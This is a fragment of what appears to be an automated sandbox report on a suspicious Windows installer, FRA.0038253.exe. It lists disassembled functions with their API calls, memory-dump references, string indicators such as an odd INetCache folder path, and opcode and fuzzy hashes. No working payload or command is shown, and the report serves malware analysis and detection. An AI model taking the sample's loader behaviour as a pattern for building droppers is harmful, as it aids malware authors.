                                                                          • Instruction Fuzzy Hash: EBB01231140300BFDA214F00DF09F057B21AB94710F10C034B384780F086711075EB0E
                                                                          Function 0040432C Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageA.USER32(00000028,?,00000001,0040415C), ref: 0040433A
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2675644289.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675700198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675926012.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend
                                                                          • String ID:
                                                                          • API String ID: 3850602802-0
                                                                          • Opcode ID: 01d356091c5cee1d9c7d245476c7fa8486dde432518b8bf3a516dd2ea8b2d9b9
                                                                          • Instruction ID: d048147452dbd0c1860f9462119a6b97fc0e3fbee653e89d9f8fcfd31795eed3
                                                                          • Opcode Fuzzy Hash: 01d356091c5cee1d9c7d245476c7fa8486dde432518b8bf3a516dd2ea8b2d9b9
                                                                          • Instruction Fuzzy Hash: D1B09276381601AADA619B00DE09F457A62E7A8B02F418028B244244B0CAB204A1DB18
                                                                          Function 00404319 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • KiUserCallbackDispatcher.NTDLL(?,004040F5), ref: 00404323
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2675644289.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675700198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675926012.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: CallbackDispatcherUser
                                                                          • String ID:
                                                                          • API String ID: 2492992576-0
                                                                          • Opcode ID: 3449ea68190b592a5798f96a6ea8876c912ca1a27c45f6fa5be79c3d216cc7d8
                                                                          • Instruction ID: 2eb38c10ea06243a6a86091da43815d65464e49ad358049b9a5b8d6cdb695d6a
                                                                          • Opcode Fuzzy Hash: 3449ea68190b592a5798f96a6ea8876c912ca1a27c45f6fa5be79c3d216cc7d8
                                                                          • Instruction Fuzzy Hash: F0A012B11011009BCB014B00EF04805BA61A750300700C038A1411003187310421FB09
                                                                          Function 00401FA0 Relevance: 1.3, APIs: 1, Instructions: 37COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 0040539B: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nspA3DD.tmp\System.dll,00000000,004178D8,00000000,?,?,?,?,?,?,?,?,?,00403298,00000000,?), ref: 004053D4
                                                                            • Part of subcall function 0040539B: lstrlenA.KERNEL32(00403298,Skipped: C:\Users\user\AppData\Local\Temp\nspA3DD.tmp\System.dll,00000000,004178D8,00000000,?,?,?,?,?,?,?,?,?,00403298,00000000), ref: 004053E4
                                                                            • Part of subcall function 0040539B: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nspA3DD.tmp\System.dll,00403298,00403298,Skipped: C:\Users\user\AppData\Local\Temp\nspA3DD.tmp\System.dll,00000000,004178D8,00000000), ref: 004053F7
                                                                            • Part of subcall function 0040539B: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nspA3DD.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nspA3DD.tmp\System.dll), ref: 00405409
                                                                            • Part of subcall function 0040539B: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040542F
                                                                            • Part of subcall function 0040539B: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405449
                                                                            • Part of subcall function 0040539B: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405457
                                                                            • Part of subcall function 004058F0: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00422128,00426800,00426800,00426800,?,920,00000000), ref: 00405919
                                                                            • Part of subcall function 004058F0: CloseHandle.KERNEL32(?), ref: 00405926
                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FE5
                                                                            • Part of subcall function 004066F4: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406705
                                                                            • Part of subcall function 004066F4: GetExitCodeProcess.KERNEL32(?,?), ref: 00406727
                                                                            • Part of subcall function 004061B5: wsprintfA.USER32 ref: 004061C2
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2675644289.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675700198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675926012.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                          • String ID:
                                                                          • API String ID: 2972824698-0
                                                                          • Opcode ID: c2a232cfaa7ea22cdfd64dd800ee1d9452b4e1bcb438eb6831dd9ff850e197ad
                                                                          • Instruction ID: db9ede1ab5137ae9ee8fe17b22ac7e1cc92bb5324d9ca2e84c12474690a006a4
                                                                          • Opcode Fuzzy Hash: c2a232cfaa7ea22cdfd64dd800ee1d9452b4e1bcb438eb6831dd9ff850e197ad
                                                                          • Instruction Fuzzy Hash: 0AF05432A051219BCF20ABA55D849EF62E8DB01318B15453FF502F21D2C77C4A429AAE
                                                                          Function 004014D6 Relevance: 1.3, APIs: 1, Instructions: 19sleepCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • Sleep.KERNELBASE(00000000), ref: 004014E9
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2675644289.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675700198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675926012.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: Sleep
                                                                          • String ID:
                                                                          • API String ID: 3472027048-0
                                                                          • Opcode ID: 6df6ed9069f820e2cc3179e75ffe12f3728730b81e3d8cdd4856c58ec50d956f
                                                                          • Instruction ID: ea83160534d3c72e14e6becd9d4bd1827c1d0c67ada78eb109745cf75ed44a8b
                                                                          • Opcode Fuzzy Hash: 6df6ed9069f820e2cc3179e75ffe12f3728730b81e3d8cdd4856c58ec50d956f
                                                                          • Instruction Fuzzy Hash: 59D05E73B142009FDB64DBB8BEC445F73A4E7403257304837E402E20D1E57889428618

                                                                          Non-executed Functions

                                                                          Function 00404789 Relevance: 26.5, APIs: 10, Strings: 5, Instructions: 274stringCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetDlgItem.USER32(?,000003FB), ref: 004047D8
                                                                          • SetWindowTextA.USER32(00000000,?), ref: 00404802
                                                                          • SHBrowseForFolderA.SHELL32(?,0041FCF8,?), ref: 004048B3
                                                                          • CoTaskMemFree.OLE32(00000000), ref: 004048BE
                                                                          • lstrcmpiA.KERNEL32(Call,spidsmus: Installing), ref: 004048F0
                                                                          • lstrcatA.KERNEL32(?,Call), ref: 004048FC
                                                                          • SetDlgItemTextA.USER32(?,000003FB,?), ref: 0040490E
                                                                            • Part of subcall function 00405951: GetDlgItemTextA.USER32(?,?,00000400,00404945), ref: 00405964
                                                                            • Part of subcall function 00406551: CharNextA.USER32(0000000C,*?|<>/":,00000000,?,77673410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\FRA.0038253.exe",0040337D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040367F,?,00000008,0000000A,0000000C), ref: 004065A9
                                                                            • Part of subcall function 00406551: CharNextA.USER32(0000000C,0000000C,0000000C,00000000,?,77673410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\FRA.0038253.exe",0040337D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040367F,?,00000008,0000000A,0000000C), ref: 004065B6
                                                                            • Part of subcall function 00406551: CharNextA.USER32(0000000C,?,77673410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\FRA.0038253.exe",0040337D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040367F,?,00000008,0000000A,0000000C), ref: 004065BB
                                                                            • Part of subcall function 00406551: CharPrevA.USER32(0000000C,0000000C,77673410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\FRA.0038253.exe",0040337D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040367F,?,00000008,0000000A,0000000C), ref: 004065CB
                                                                          • GetDiskFreeSpaceA.KERNEL32(0041F8F0,?,?,0000040F,?,0041F8F0,0041F8F0,?,00000001,0041F8F0,?,?,000003FB,?), ref: 004049CC
                                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004049E7
                                                                            • Part of subcall function 00404B40: lstrlenA.KERNEL32(spidsmus: Installing,spidsmus: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404A5B,000000DF,00000000,00000400,?), ref: 00404BDE
                                                                            • Part of subcall function 00404B40: wsprintfA.USER32 ref: 00404BE6
                                                                            • Part of subcall function 00404B40: SetDlgItemTextA.USER32(?,spidsmus: Installing), ref: 00404BF9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2675644289.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675700198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675926012.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                          • String ID: A$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\mars\universaltang\reseek$Call$\7w$spidsmus: Installing
                                                                          • API String ID: 2624150263-2670337425
                                                                          • Opcode ID: a70579a3d7acda06ba10cc20817b52a319b8fb6100fd3c7b572cde85c5f37867
                                                                          • Instruction ID: 3761125bbef1c3228a87373e5864fd706f39901ada387834bd2bc6b797aaef4e
                                                                          • Opcode Fuzzy Hash: a70579a3d7acda06ba10cc20817b52a319b8fb6100fd3c7b572cde85c5f37867
                                                                          • Instruction Fuzzy Hash: BFA170F1A00219ABDB11AFA5CC45AAF76B8EF84314F14843BF611B62D1D77C8A418F6D
                                                                          Function 70751B28 Relevance: 20.1, APIs: 13, Instructions: 591stringlibrarymemoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 707512A5: GlobalAlloc.KERNEL32(00000040,707512C3,?,7075135F,-7075504B,707511C0,-000000A0), ref: 707512AD
                                                                          • GlobalAlloc.KERNEL32(00000040,000014A4), ref: 70751C54
                                                                          • lstrcpyA.KERNEL32(00000008,?), ref: 70751C9C
                                                                          • lstrcpyA.KERNEL32(00000408,?), ref: 70751CA6
                                                                          • GlobalFree.KERNEL32(00000000), ref: 70751CB9
                                                                          • GlobalFree.KERNEL32(?), ref: 70751D99
                                                                          • GlobalFree.KERNEL32(?), ref: 70751D9E
                                                                          • GlobalFree.KERNEL32(?), ref: 70751DA3
                                                                          • GlobalFree.KERNEL32(00000000), ref: 70751F8A
                                                                          • lstrcpyA.KERNEL32(?,?), ref: 70752128
                                                                          • GetModuleHandleA.KERNEL32(00000008), ref: 707521A4
                                                                          • LoadLibraryA.KERNEL32(00000008), ref: 707521B5
                                                                          • GetProcAddress.KERNEL32(?,?), ref: 7075220E
                                                                          • lstrlenA.KERNEL32(00000408), ref: 70752228
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2702525007.0000000070751000.00000020.00000001.01000000.00000006.sdmp, Offset: 70750000, based on PE: true
                                                                          • Associated: 00000000.00000002.2702483320.0000000070750000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2702568520.0000000070754000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2702605900.0000000070756000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_70750000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                          • String ID:
                                                                          • API String ID: 245916457-0
                                                                          • Opcode ID: e7a538326da7bf164c407b97501501b610a04e29fc5f191dc2ae909b9aeb6650
                                                                          • Instruction ID: 78762d530564ebc7bcde77772ce318d9ace6e60be0e8cdf3e64ec5e724bbc52c
                                                                          • Opcode Fuzzy Hash: e7a538326da7bf164c407b97501501b610a04e29fc5f191dc2ae909b9aeb6650
                                                                          • Instruction Fuzzy Hash: 5D229E71E0460ADEDB12CFA4C9857EEBBF5BB05306F20852ED196E3280D774598ACB50
                                                                          Function 00402198 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139comCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CoCreateInstance.OLE32(00408410,?,00000001,00408400,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040221D
                                                                          • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00408400,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004022CF
                                                                          Strings
                                                                          • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\mars\universaltang\reseek, xrefs: 0040225D
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2675644289.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675700198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675926012.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: ByteCharCreateInstanceMultiWide
                                                                          • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\mars\universaltang\reseek
                                                                          • API String ID: 123533781-2569430447
                                                                          • Opcode ID: 7e4bcfcb923b49e39238d4f2abe520509187d47aa8ab1ec228f7b2c395526c7a
                                                                          • Instruction ID: acdf6e72f6b947bb0a5284ae4ba0deec300858df55e4778d54948ee42eae8bd0
                                                                          • Opcode Fuzzy Hash: 7e4bcfcb923b49e39238d4f2abe520509187d47aa8ab1ec228f7b2c395526c7a
                                                                          • Instruction Fuzzy Hash: E2511B71A00218AFDF00EFA4CA88A9D7BB5FF48314F2045BAF515FB2D1DA799981CB54
                                                                          Function 004027CF Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 004027DE
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2675644289.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675700198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675926012.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: FileFindFirst
                                                                          • String ID:
                                                                          • API String ID: 1974802433-0
                                                                          • Opcode ID: b27f7557ea335839b4c48d632a2dbdad774065ecb69396978edf4fedf326f071
                                                                          • Instruction ID: 5ed852e6a610c10883a0fdcbaa2a1eabfa39daaf502c0fc8fb26de8a8de58f20
                                                                          • Opcode Fuzzy Hash: b27f7557ea335839b4c48d632a2dbdad774065ecb69396978edf4fedf326f071
                                                                          • Instruction Fuzzy Hash: 70F0A771644110DFDB50EBA49E49AEE77689F61314F6000BBE141B20C1C6B84946972E
                                                                          Function 00404CFC Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 491windowmemoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetDlgItem.USER32(?,000003F9), ref: 00404D13
                                                                          • GetDlgItem.USER32(?,00000408), ref: 00404D20
                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00404D6F
                                                                          • LoadImageA.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404D86
                                                                          • SetWindowLongA.USER32(?,000000FC,0040530F), ref: 00404DA0
                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404DB2
                                                                          • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404DC6
                                                                          • SendMessageA.USER32(?,00001109,00000002), ref: 00404DDC
                                                                          • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404DE8
                                                                          • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404DF8
                                                                          • DeleteObject.GDI32(00000110), ref: 00404DFD
                                                                          • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404E28
                                                                          • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404E34
                                                                          • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404ECE
                                                                          • SendMessageA.USER32(?,0000110A,00000003,00000110), ref: 00404EFE
                                                                            • Part of subcall function 0040432C: SendMessageA.USER32(00000028,?,00000001,0040415C), ref: 0040433A
                                                                          • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404F12
                                                                          • GetWindowLongA.USER32(?,000000F0), ref: 00404F40
                                                                          • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404F4E
                                                                          • ShowWindow.USER32(?,00000005), ref: 00404F5E
                                                                          • SendMessageA.USER32(?,00000419,00000000,?), ref: 00405059
                                                                          • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 004050BE
                                                                          • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 004050D3
                                                                          • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 004050F7
                                                                          • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00405117
                                                                          • ImageList_Destroy.COMCTL32(00000000), ref: 0040512C
                                                                          • GlobalFree.KERNEL32(00000000), ref: 0040513C
                                                                          • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 004051B5
                                                                          • SendMessageA.USER32(?,00001102,?,?), ref: 0040525E
                                                                          • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 0040526D
                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00405298
                                                                          • ShowWindow.USER32(?,00000000), ref: 004052E6
                                                                          • GetDlgItem.USER32(?,000003FE), ref: 004052F1
                                                                          • ShowWindow.USER32(00000000), ref: 004052F8
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2675644289.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675700198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675926012.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                          • String ID: $M$N$\7w
                                                                          • API String ID: 2564846305-1400300550
                                                                          • Opcode ID: 057dc493640dd527312795b1c53916febee8d97b88cead7ded06e88e49cdd7c4
                                                                          • Instruction ID: 2d5f9558e6aac702e0a48f70f644e8e6101da383f69b12cb8e913c1bf49828ac
                                                                          • Opcode Fuzzy Hash: 057dc493640dd527312795b1c53916febee8d97b88cead7ded06e88e49cdd7c4
                                                                          • Instruction Fuzzy Hash: 1C027EB0A00209AFEB20DF94DD45AAE7BB5FB44314F10417AF611BA2E1C7799D82DF58
                                                                          Function 00404462 Relevance: 40.5, APIs: 19, Strings: 4, Instructions: 202windowstringCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 004044ED
                                                                          • GetDlgItem.USER32(00000000,000003E8), ref: 00404501
                                                                          • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 0040451F
                                                                          • GetSysColor.USER32(?), ref: 00404530
                                                                          • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 0040453F
                                                                          • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 0040454E
                                                                          • lstrlenA.KERNEL32(?), ref: 00404551
                                                                          • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404560
                                                                          • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404575
                                                                          • GetDlgItem.USER32(?,0000040A), ref: 004045D7
                                                                          • SendMessageA.USER32(00000000), ref: 004045DA
                                                                          • GetDlgItem.USER32(?,000003E8), ref: 00404605
                                                                          • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404645
                                                                          • LoadCursorA.USER32(00000000,00007F02), ref: 00404654
                                                                          • SetCursor.USER32(00000000), ref: 0040465D
                                                                          • LoadCursorA.USER32(00000000,00007F00), ref: 00404673
                                                                          • SetCursor.USER32(00000000), ref: 00404676
                                                                          • SendMessageA.USER32(00000111,00000001,00000000), ref: 004046A2
                                                                          • SendMessageA.USER32(00000010,00000000,00000000), ref: 004046B6
                                                                          Strings
                                                                          Memory Dump Source
